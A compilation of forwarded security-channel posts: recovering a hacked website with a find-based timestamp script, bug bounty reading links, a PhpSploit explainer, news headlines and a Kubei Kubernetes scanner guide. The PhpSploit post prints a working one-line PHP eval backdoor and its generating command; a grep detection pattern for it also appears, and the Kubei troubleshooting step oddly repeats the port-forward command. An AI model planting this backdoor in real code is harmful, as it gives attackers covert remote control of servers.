Forwarded from UNDERCODE NEWS
How to deal with a hacked website (web)
After confirming that the website has been hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some follow-up and preventive work.
1. Immediately stop the website service so that users and other sites are not affected any further (returning a 503 status code is recommended).
2. If multiple sites at the same hosting provider were hacked during the same period, contact the hosting provider and urge them to respond.
3. Clean up the hacked content that has been discovered, make the hacked pages return 404 (dead links), and submit them through the dead link submission tool of the Baidu webmaster platform.
4. Work out the likely time of the hack, compare it with the file modification times on the server, and deal with the files the attackers uploaded or modified; check the server's user management settings for abnormal changes; change the server's user access passwords. Note: the likely time of the hack can be determined from the access log. However, the attacker may also have modified the server's access log.
5. Tighten security: check the website for vulnerabilities and prevent it from being hacked again.
Hope it can be helpful to everyone!
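One way to carry out the comparison in step 4, as an added example that is not part of the original post: list the files whose modification time falls inside the suspected window, and separately flag files whose inode change time is inside the window while their mtime is not, since an mtime can be rewritten just as an access log can. It assumes GNU find; the web root and the timestamps are placeholders supplied by the operator.

```shell
#!/bin/sh
# Added example (not from the original post). Requires GNU find.
# Times are strings such as "2024-05-01 00:00:00" in the server's local zone.

# files_modified_between ROOT START END
# Files with START < mtime <= END, oldest first, as "mtime<TAB>path".
files_modified_between() {
    find "$1" -type f -newermt "$2" ! -newermt "$3" \
        -printf '%TY-%Tm-%Td %TH:%TM\t%p\n' | sort
}

# backdated_in_window ROOT START END
# Files whose inode change time (ctime) is inside the window while their
# mtime is outside it. touch(1) can rewrite mtime but not ctime, so these
# are candidates for timestamp tampering.
backdated_in_window() {
    find "$1" -type f -newerct "$2" ! -newerct "$3" \
        \( ! -newermt "$2" -o -newermt "$3" \) -print | sort
}

# Stand-alone use: script.sh /var/www/html "START" "END"
# (web root and times are placeholders chosen by the operator)
if [ "$#" -eq 3 ]; then
    echo "== modified inside window =="
    files_modified_between "$1" "$2" "$3"
    echo "== changed inside window, mtime outside =="
    backdated_in_window "$1" "$2" "$3"
fi
```

A ctime inside the window is only a lead: permission changes, renames and restores from backup also update it, so confirm each hit against a known-good copy of the site.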
Forwarded from UNDERCODE NEWS
Bug bounty PDFs and videos:
https://owasp.org/www-pdf-archive/Getting_Started_with_Bug_Bounty..pdf
https://www.diva-portal.org/smash/get/diva2:723516/FULLTEXT02.pdf
https://foundershield.com/wp-content/uploads/2018/02/state-of-bug-bounty-08-2015.compressed.pdf
https://www.govinfo.gov/content/pkg/CHRG-115shrg37302/pdf/CHRG-115shrg37302.pdf
https://www.youtube.com/watch?v=Qw1nNPiH_Go (1:22 h)
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunting-methodology-v2/ (1 h)
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunter-methodology-v3/ (1h 22)
https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a (18 min)
Forwarded from UNDERCODE NEWS
What is PhpSploit?
1) PhpSploit is a remote control framework that aims to provide a covert, shell-like interactive connection over HTTP between a client and a web server.
2) It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation: a fully functional C2 framework that is hidden on a web server as a one-line PHP backdoor.
3) When you run PhpSploit and generate a standard backdoor for hosting in WordPress or PHP code, the following line is created, which is a full-fledged backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
4) The above code can be generated by running the following command:
phpsploit --interactive --eval "backdoor"
5) Just one hit: ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY like this:
set PASSKEY xy...
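A defender-side check for the one-liner shown in step 3, as an added example that is not part of the original post or of PhpSploit: it searches a web root for PHP that passes a request-controlled superglobal straight into eval(), matching on that structure rather than on one fixed header name. The function names and the list of file extensions are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post). Uses grep -r with --include.

# Extended regex: eval( $_SERVER[ / $_POST[ / ... with optional whitespace.
# Matched case-insensitively because PHP function names are case-insensitive.
HEADER_EVAL_RE='eval[[:space:]]*\([[:space:]]*\$_(SERVER|REQUEST|POST|GET|COOKIE)[[:space:]]*\['

# scan_header_eval ROOT
# Prints "path:line:text" for every matching line in PHP-like files.
scan_header_eval() {
    grep -rnEi --include='*.php' --include='*.phtml' --include='*.inc' \
        "$HEADER_EVAL_RE" "$1"
}

# hit_files ROOT
# Prints only the paths of files that contain at least one match, sorted.
hit_files() {
    grep -rlEi --include='*.php' --include='*.phtml' --include='*.inc' \
        "$HEADER_EVAL_RE" "$1" | sort
}

# Stand-alone use: script.sh /var/www/html   (path is a placeholder)
if [ "$#" -eq 1 ]; then
    scan_header_eval "$1"
fi
```

Any hit deserves manual review: legitimate code has no reason to evaluate a request header, while a clean result does not rule out obfuscated or differently structured backdoors.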
Forwarded from UNDERCODE NEWS
Android_app_vulnerability_classes.pdf
332 KB
Overview of common Android app vulnerabilities reported through the Google Play Security Rewards Program
- Explicitly not an attempt at creating a complete audit guide
- Focused only on vulnerabilities in scope for our bug bounty
- For each vulnerability present:
  - Overview
  - Auditing tips
  - Remediation tips
  - Bug bounty pay-out
  - CWE ID (Common Weakness Enumeration) and other resources
Forwarded from UNDERCODE NEWS
Apple's "chip dream" evaporates Qualcomm 85 billion. Who will be the next supplier to be eliminated?
#Technologies
Forwarded from UNDERCODE NEWS
Behind recycled lithium batteries, the profiteering industry: The recycling market alone hits 117.8 billion
#international
Forwarded from UNDERCODE NEWS
Russian hackers have been in and out of the US Treasury and Commerce Departments for over a year.
#CyberAttacks
How to test a Kubernetes cluster for vulnerabilities?
1) Kubei is a vulnerability scanning tool that allows users to get an accurate and immediate risk assessment of their Kubernetes clusters.
2) Kubei scans all images that are in use in the Kubernetes cluster, including application and system pod images.
3) It does not scan image registries and does not require prior integration with CI / CD pipelines.
4) It is a customizable tool that allows users to determine the scope of the scan (target namespaces), speed and level of interest.
5) The tool also provides a graphical interface that allows an administrator to determine where and what should be replaced in order to mitigate the impact of discovered vulnerabilities.
6) Requirements
The Kubernetes cluster is already up and running and kubeconfig (~/.kube/config) is correctly configured for the target cluster.
Usage
7) Run the following command to deploy Kubei to the cluster:
kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
8) Run the following command to make sure Kubei is up and running:
kubectl -n kubei get pod -lapp=kubei
9) Then forward the port to the Kubei web app with the following command:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
In your browser, go to http://localhost:8080/view/ and then click GO to start the scan.
To check the status of Kubei and the progress of the current scan, run the following command:
kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
Refresh the page (http://localhost:8080/view/) to update the results.
If some pods are stuck in Waiting status, you can solve this error with:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080